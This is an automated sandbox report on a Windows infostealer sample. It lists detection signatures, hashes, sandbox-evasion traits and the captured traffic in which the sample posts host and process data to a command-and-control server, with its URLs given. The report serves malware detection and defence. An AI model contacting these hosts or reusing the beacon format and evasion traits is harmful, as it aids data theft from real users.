Windows Analysis Report
TX5LAYBZRI.exe

Overview

General Information

Sample name: TX5LAYBZRI.exe (renamed because original name is a hash value)
Original sample name: 94dfcba69551e571570208f53fac90d6.exe
Analysis ID: 1582833
MD5: 94dfcba69551e571570208f53fac90d6
SHA1: 2280c39c446cef46be9388ff3124f6e9c61f7622
SHA256: 41e22386a926fc18dbc6d5a3b37fb560463965dd7539c9cf0b67974dd69882fe
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • TX5LAYBZRI.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\TX5LAYBZRI.exe" MD5: 94DFCBA69551E571570208F53FAC90D6)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: TX5LAYBZRI.exe | Avira: detected
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZ | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | Avira URL Cloud: Label: malware
Source: TX5LAYBZRI.exe | Virustotal: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: TX5LAYBZRI.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: -----BEGIN PUBLIC KEY----- | 0_2_00BBDCF0
Source: TX5LAYBZRI.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_00BFA5B0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_00BFA7F0 (reported 2 times)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_00BFA7F0 (reported 2 times)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_00BFA7F0 (reported 2 times)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_00BFB560
Source: TX5LAYBZRI.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00B9255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00B929FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */* | Content-Type: application/json | Content-Length: 502080 | Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 38 33 31 36 35 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
Source: global traffic | HTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */*
Source: global traffic | HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */* | Content-Type: application/json | Content-Length: 31 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 34.200.57.114
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (reported 5 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 8 times)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C5A8C0 recvfrom
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fortth14vs.top
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | server: nginx/1.22.1 | date: Tue, 31 Dec 2024 14:47:07 GMT | content-type: text/html; charset=utf-8 | content-length: 207 | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | server: nginx/1.22.1 | date: Tue, 31 Dec 2024 14:47:08 GMT | content-type: text/html; charset=utf-8 | content-length: 207 | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000003.2124954630.0000000002112000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125285281.0000000002124000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125032525.000000000211F000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139392005.0000000002125000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZ
Source: TX5LAYBZRI.exe, 00000000.00000003.2125569370.00000000020B2000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125601591.00000000020B7000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139117572.00000000020B9000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: TX5LAYBZRI.exe, 00000000.00000003.2124979245.00000000020C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: TX5LAYBZRI.exe, 00000000.00000003.2125569370.00000000020B2000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125601591.00000000020B7000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139117572.00000000020B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: TX5LAYBZRI.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: TX5LAYBZRI.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TX5LAYBZRI.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: TX5LAYBZRI.exe | Static PE information: section name: (empty name)
Source: TX5LAYBZRI.exe | Static PE information: section name: .idata
Source: TX5LAYBZRI.exe | Static PE information: section name: (empty name)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BA05B0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BA6FA0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C5B180
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BCF100
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C600E0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F1E050
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F1A000
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BF6210
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C5E3E0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C5C320
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C60420
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00EE4410
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00B9E620
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BFA7F0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F14780
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C5C770
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00EF6730
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C4C900
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00B9A960
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BA4940
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00D66AC0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00E4AAC0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F08BF0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00B9CBB0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00D24B60
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00E4AB2C
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F1CC90
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F0CD80
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F14D40
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00EAAE30
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C5EF90
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C58F90
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00EE2F90
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BB4F70
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BA10E6
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00EFD430
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F035B0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00EE56D0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F217A0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C49880
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00EE9920
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F13A70
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F01BD0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BD1BE0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00EF7CC0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00E49C80
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BA5DB0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BB5EB0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BA3ED0
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00B9C960 appears 37 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00BD5340 appears 50 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00BD4F40 appears 335 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00BD4FD0 appears 289 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00C744A0 appears 76 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00BACCD0 appears 55 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00B975A0 appears 698 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00B973F0 appears 111 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00D47220 appears 96 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00D6CBC0 appears 104 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00B971E0 appears 47 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00B9CAA0 appears 64 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00BACD40 appears 80 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: String function: 00BD50A0 appears 101 times
Source: TX5LAYBZRI.exe | Static PE information: Section: abkqriqx ZLIB complexity 0.9942570729725911
Source: TX5LAYBZRI.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@9/2
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 4 times)
Source: TX5LAYBZRI.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: TX5LAYBZRI.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Section loaded: kernel.appcore.dll
Source: TX5LAYBZRI.exe | Static file information: File size 4485632 > 1048576
Source: TX5LAYBZRI.exe | Static PE information: Raw size of section (empty name) is bigger than: 0x100000 < 0x289000
Source: TX5LAYBZRI.exe | Static PE information: Raw size of section abkqriqx is bigger than: 0x100000 < 0x1ba600

Data Obfuscation

Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Unpacked PE file: 0.2.TX5LAYBZRI.exe.b90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;abkqriqx:EW;csfzocsp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;abkqriqx:EW;csfzocsp:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: TX5LAYBZRI.exe | Static PE information: real checksum: 0x453b98 should be: 0x44a30c
Source: TX5LAYBZRI.exe | Static PE information: section name: (empty name)
Source: TX5LAYBZRI.exe | Static PE information: section name: .idata
Source: TX5LAYBZRI.exe | Static PE information: section name: (empty name)
Source: TX5LAYBZRI.exe | Static PE information: section name: abkqriqx
Source: TX5LAYBZRI.exe | Static PE information: section name: csfzocsp
Source: TX5LAYBZRI.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_3_0211C9B9 push eax; ret | 0_3_0211CA81 (reported 3 times)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F141D0 push eax; mov dword ptr [esp], edx | 0_2_00F141D5
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C12340 push eax; mov dword ptr [esp], 00000000h | 0_2_00C12343
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C4C7F0 push eax; mov dword ptr [esp], 00000000h | 0_2_00C4C743
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BEE92D push es; retf | 0_2_00BEE92E
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BD0AC0 push eax; mov dword ptr [esp], 00000000h | 0_2_00BD0AC4
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BF1430 push eax; mov dword ptr [esp], 00000000h | 0_2_00BF1433
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00C139A0 push eax; mov dword ptr [esp], 00000000h | 0_2_00C139A3
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00BEDAD0 push eax; mov dword ptr [esp], edx | 0_2_00BEDAD1
Source: C:\Users\user\Desktop\TX5LAYBZRI.exe | Code function: 0_2_00F19F40 push dword ptr [eax+04h]; ret | 0_2_00F19F6F
Source: TX5LAYBZRI.exe | Static PE information: section name: abkqriqx entropy: 7.95457753765941
